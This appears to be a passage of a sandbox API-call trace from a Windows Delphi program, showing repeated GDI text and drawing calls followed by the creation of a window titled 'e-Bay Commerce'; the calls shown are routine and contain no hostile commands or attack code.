GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.331] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.331] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.331] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.331] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.331] GetSystemMetrics (nIndex=6) returned 1 [0093.331] GetDC (hWnd=0x0) returned 0xc0100ae [0093.331] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.331] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.331] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.332] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.332] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.332] GetSystemMetrics (nIndex=6) returned 1 [0093.334] GetDC (hWnd=0x0) returned 0xc0100ae [0093.334] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.334] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.334] GetSysColor (nIndex=8) returned 0x0 [0093.334] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.334] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.334] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.334] UnrealizeObject (h=0x2d10099f) returned 1 [0093.334] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.334] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.334] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.335] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f6a1, format=0x440 | out: lpchText=" ", lprc=0x19f6a1) returned 13 [0093.335] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.335] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.335] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.335] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f68c | out: lppt=0x19f68c) returned 1 [0093.335] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.335] GetDC (hWnd=0x0) returned 0xc0100ae [0093.336] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.336] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.336] GetSysColor (nIndex=8) returned 0x0 [0093.336] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.336] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.336] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.336] UnrealizeObject (h=0x2d10099f) returned 1 [0093.336] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.336] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.336] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.336] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f6a1, format=0x440 | out: lpchText=" ", lprc=0x19f6a1) returned 13 [0093.336] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.336] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.336] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.336] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f68c | out: lppt=0x19f68c) returned 1 [0093.336] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.337] GetDC (hWnd=0x0) returned 0xc0100ae [0093.337] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.337] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.337] GetSysColor (nIndex=8) returned 0x0 [0093.338] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.338] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.338] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.338] UnrealizeObject (h=0x2d10099f) returned 1 [0093.338] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.338] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.338] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.338] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f6a1, format=0x440 | out: lpchText=" ", lprc=0x19f6a1) returned 13 [0093.338] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.338] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.338] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.338] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f68c | out: lppt=0x19f68c) returned 1 [0093.338] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.339] GetDC (hWnd=0x0) returned 0xc0100ae [0093.339] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.339] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.339] GetSysColor (nIndex=8) returned 0x0 [0093.339] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.339] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.339] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.339] UnrealizeObject (h=0x2d10099f) returned 1 [0093.340] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.340] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.340] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.341] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f6a1, format=0x440 | out: lpchText=" ", lprc=0x19f6a1) returned 13 [0093.341] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.342] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.342] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.342] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f68c | out: lppt=0x19f68c) returned 1 [0093.342] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.343] GetDC (hWnd=0x0) returned 0xc0100ae [0093.343] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.343] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.343] GetSysColor (nIndex=8) returned 0x0 [0093.343] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.343] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.343] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.343] UnrealizeObject (h=0x2d10099f) returned 1 [0093.343] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.344] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.344] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.344] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f6a1, format=0x440 | out: lpchText=" ", lprc=0x19f6a1) returned 13 [0093.344] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.344] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.344] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.344] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f68c | out: lppt=0x19f68c) returned 1 [0093.344] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.345] GetDC (hWnd=0x0) returned 0xc0100ae [0093.345] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f960 | out: lptm=0x19f960) returned 1 [0093.345] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.345] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f998 | out: lptm=0x19f998) returned 1 [0093.345] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.345] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.345] GetSystemMetrics (nIndex=6) returned 1 [0093.346] GetDC (hWnd=0x0) returned 0xc0100ae [0093.346] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f604 | out: lptm=0x19f604) returned 1 [0093.346] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.346] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f63c | out: lptm=0x19f63c) returned 1 [0093.346] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.346] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.346] GetSystemMetrics (nIndex=6) returned 1 [0093.346] GetDC (hWnd=0x0) returned 0xc0100ae [0093.346] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f664 | out: lptm=0x19f664) returned 1 [0093.346] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.346] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f69c | out: lptm=0x19f69c) returned 1 [0093.346] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.346] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.347] GetSystemMetrics (nIndex=6) returned 1 [0093.347] GetDC (hWnd=0x0) returned 0xc0100ae [0093.347] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f960 | out: lptm=0x19f960) returned 1 [0093.347] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.347] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f998 | out: lptm=0x19f998) returned 1 [0093.347] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.347] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.347] GetSystemMetrics (nIndex=6) returned 1 [0093.347] GetDC (hWnd=0x0) returned 0xc0100ae [0093.347] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f604 | out: lptm=0x19f604) returned 1 [0093.348] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.348] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f63c | out: lptm=0x19f63c) returned 1 [0093.348] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.348] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.348] GetSystemMetrics (nIndex=6) returned 1 [0093.348] GetDC (hWnd=0x0) returned 0xc0100ae [0093.348] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f664 | out: lptm=0x19f664) returned 1 [0093.348] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.348] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f69c | out: lptm=0x19f69c) returned 1 [0093.348] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.348] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.348] GetSystemMetrics (nIndex=6) returned 1 [0093.349] GetDC (hWnd=0x0) returned 0xc0100ae [0093.349] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f960 | out: lptm=0x19f960) returned 1 [0093.349] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.349] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f998 | out: lptm=0x19f998) returned 1 [0093.349] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.349] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.349] GetSystemMetrics (nIndex=6) returned 1 [0093.349] GetDC (hWnd=0x0) returned 0xc0100ae [0093.349] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f604 | out: lptm=0x19f604) returned 1 [0093.349] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.349] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f63c | out: lptm=0x19f63c) returned 1 [0093.349] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.349] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.349] GetSystemMetrics (nIndex=6) returned 1 [0093.350] GetDC (hWnd=0x0) returned 0xc0100ae [0093.350] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f664 | out: lptm=0x19f664) returned 1 [0093.350] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.350] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f69c | out: lptm=0x19f69c) returned 1 [0093.350] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.350] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.350] GetSystemMetrics (nIndex=6) returned 1 [0093.353] GetDC (hWnd=0x0) returned 0xc0100ae [0093.353] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f960 | out: lptm=0x19f960) returned 1 [0093.353] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.353] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f998 | out: lptm=0x19f998) returned 1 [0093.354] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.354] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.354] GetSystemMetrics (nIndex=6) returned 1 [0093.354] GetDC (hWnd=0x0) returned 0xc0100ae [0093.354] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f604 | out: lptm=0x19f604) returned 1 [0093.354] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.354] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f63c | out: lptm=0x19f63c) returned 1 [0093.354] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.354] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.354] GetSystemMetrics (nIndex=6) returned 1 [0093.354] GetDC (hWnd=0x0) returned 0xc0100ae [0093.354] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f664 | out: lptm=0x19f664) returned 1 [0093.354] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.354] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f69c | out: lptm=0x19f69c) returned 1 [0093.354] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.354] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.355] GetSystemMetrics (nIndex=6) returned 1 [0093.357] GetDC (hWnd=0x0) returned 0xc0100ae [0093.357] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f94c | out: lptm=0x19f94c) returned 1 [0093.357] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.357] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f984 | out: lptm=0x19f984) returned 1 [0093.357] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.357] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.357] GetSystemMetrics (nIndex=6) returned 1 [0093.358] GetDC (hWnd=0x0) returned 0xc0100ae [0093.359] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.359] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.359] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.359] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.359] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.359] GetSystemMetrics (nIndex=6) returned 1 [0093.359] GetDC (hWnd=0x0) returned 0xc0100ae [0093.359] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.359] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.359] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.359] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.359] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.359] GetSystemMetrics (nIndex=6) returned 1 [0093.359] GetDC (hWnd=0x0) returned 0xc0100ae [0093.360] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.360] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.360] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.360] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.360] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.360] GetSystemMetrics (nIndex=6) returned 1 [0093.360] GetDC (hWnd=0x0) returned 0xc0100ae [0093.360] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.360] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.361] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.361] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.361] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.361] GetSystemMetrics (nIndex=6) returned 1 [0093.361] GetDC (hWnd=0x0) returned 0xc0100ae [0093.361] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.361] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.361] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.361] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.361] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.361] GetSystemMetrics (nIndex=6) returned 1 [0093.361] GetDC (hWnd=0x0) returned 0xc0100ae [0093.361] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.361] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.362] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.362] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.362] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.365] GetSystemMetrics (nIndex=6) returned 1 [0093.365] GetDC (hWnd=0x0) returned 0xc0100ae [0093.366] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.366] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.366] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.366] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.366] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.366] GetSystemMetrics (nIndex=6) returned 1 [0093.366] GetDC (hWnd=0x0) returned 0xc0100ae [0093.366] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.366] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.366] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.366] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.366] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.366] GetSystemMetrics (nIndex=6) returned 1 [0093.366] GetDC (hWnd=0x0) returned 0xc0100ae [0093.366] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.367] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.367] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.367] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.367] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.367] GetSystemMetrics (nIndex=6) returned 1 [0093.367] GetDC (hWnd=0x0) returned 0xc0100ae [0093.367] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.367] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.368] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.368] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.368] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.368] GetSystemMetrics (nIndex=6) returned 1 [0093.368] GetDC (hWnd=0x0) returned 0xc0100ae [0093.368] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.369] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.369] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.369] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.369] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.369] GetSystemMetrics (nIndex=6) returned 1 [0093.369] GetDC (hWnd=0x0) returned 0xc0100ae [0093.369] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.369] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.369] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.369] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.369] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.369] GetSystemMetrics (nIndex=6) returned 1 [0093.370] GetDC (hWnd=0x0) returned 0xc0100ae [0093.370] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.370] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.370] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.370] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.370] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.370] GetSystemMetrics (nIndex=6) returned 1 [0093.370] GetDC (hWnd=0x0) returned 0xc0100ae [0093.370] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.370] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.370] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.370] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.370] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.371] GetSystemMetrics (nIndex=6) returned 1 [0093.371] GetDC (hWnd=0x0) returned 0xc0100ae [0093.371] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.371] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.371] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.371] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.371] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.371] GetSystemMetrics (nIndex=6) returned 1 [0093.372] GetSystemMetrics (nIndex=2) returned 17 [0093.372] GetSystemMetrics (nIndex=20) returned 17 [0093.372] VirtualAlloc (lpAddress=0x221c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x221c000 [0093.373] GetDC (hWnd=0x0) returned 0xc0100ae [0093.373] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa18 | out: lptm=0x19fa18) returned 1 [0093.373] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.373] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa50 | out: lptm=0x19fa50) returned 1 [0093.373] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.373] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.373] GetSystemMetrics (nIndex=6) returned 1 [0093.374] FindResourceA (hModule=0x400000, lpName="DVCLAL", lpType=0xa) returned 0x4b9b50 [0093.374] LoadResource (hModule=0x400000, hResInfo=0x4b9b50) returned 0x4f9558 [0093.374] FreeResource (hResData=0x4f9558) returned 0 [0093.374] GetClassInfoA (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x19fa74 | out: lpWndClass=0x19fa74) returned 0 [0093.374] RegisterClassA (lpWndClass=0x4a4600) returned 0xc14b [0093.374] CreateWindowExA (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xa035a [0093.383] SetWindowLongA (hWnd=0xa035a, nIndex=-4, dwNewLong=35458665) returned 4224784 [0093.383] KillTimer (hWnd=0xa035a, uIDEvent=0x1) returned 0 [0093.383] KillTimer (hWnd=0xa035a, uIDEvent=0x1) returned 0 [0093.383] SetTimer (hWnd=0xa035a, nIDEvent=0x1, uElapse=0x1, lpTimerFunc=0x0) returned 0x1 [0093.384] GetClassInfoA (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x19fa68 | out: lpWndClass=0x19fa68) returned 1 [0093.384] CreateWindowExA (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x5035e [0093.386] SetWindowLongA (hWnd=0x5035e, nIndex=-4, dwNewLong=35458652) returned 4224784 [0093.386] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0093.386] GetClassInfoA (in: hInstance=0x400000, lpClassName="TForm1", lpWndClass=0x19fa68 | out: lpWndClass=0x19fa68) returned 0 [0093.386] RegisterClassA (lpWndClass=0x19fab4) returned 0xc1de [0093.464] CreateWindowExA (dwExStyle=0x10000, lpClassName="TForm1", lpWindowName="e-Bay Commerce", dwStyle=0x6ca0000, X=219, Y=130, nWidth=320, nHeight=240, hWndParent=0x8023e, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x402fa [0093.465] SetWindowLongA (hWnd=0x402fa, nIndex=-4, dwNewLong=35459029) returned 4473796 [0093.466] GetWindowLongA (hWnd=0x402fa, nIndex=-16) returned 113901568 [0093.466] SetPropA (hWnd=0x402fa, lpString=0xc0f1, hData=0x2211fc8) returned 1 [0093.466] SetPropA (hWnd=0x402fa, lpString=0xc0f2, hData=0x2211fc8) returned 1 [0093.466] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x24, wParam=0x0, lParam=0x19f4b4) returned 0x0 [0093.466] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x81, wParam=0x0, lParam=0x19f4a8) returned 0x1 [0093.467] CreateMenu () returned 0x320383 [0093.467] CreateMenu () returned 0x60357 [0093.467] GetVersion () returned 0x23f00206 [0093.467] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] GetVersion () returned 0x23f00206 [0093.468] InsertMenuItemA (hmenu=0x60357, item=0xffffffff, fByPosition=1, lpmi=0x19ef6b) returned 1 [0093.468] 